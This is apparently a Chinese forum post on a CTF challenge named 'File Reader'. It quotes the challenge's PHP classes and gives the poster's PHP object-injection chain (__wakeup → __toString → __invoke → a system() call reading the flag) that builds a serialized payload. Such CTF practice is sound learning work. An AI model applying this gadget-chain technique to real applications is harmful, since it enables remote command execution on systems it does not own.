题目地址:File Reader
代码是:
<?phpclass A { public $file; public $luo; public function __construct() { } public function __toString() { $function = $this->luo; return $function(); }}class B { public $a; public $test; public function __construct() { } public function __wakeup() { echo($this->test); } public function __invoke() { $this->a->rce_me(); }}class C { public $b; public function __construct($b = null) { $this->b = $b; } public function rce_me() { echo "Success!\n"; system("cat /flag/flag.txt > /tmp/flag"); }}我写的反序列化代码:
<?phpclass A { public $file; public $luo;}class B { public $a; public $test;}class C { public $b;}// 1. 构造命令执行类$c = new C();// 2. 构造 B 类,绑定 C 类$b = new B();$b->a = $c;// 3. 构造 A 类,luo 属性指向 B 对象(触发 __invoke)$a = new A();$a->luo = $b;// 4. B 对象的 test 属性绑定 A 对象(echo 触发 __toString)$b->test = $a;// 生成最终序列化 payloadecho serialize($b);?>
发表于 2026-4-25 13:07
|
发表于 2026-4-25 13:08
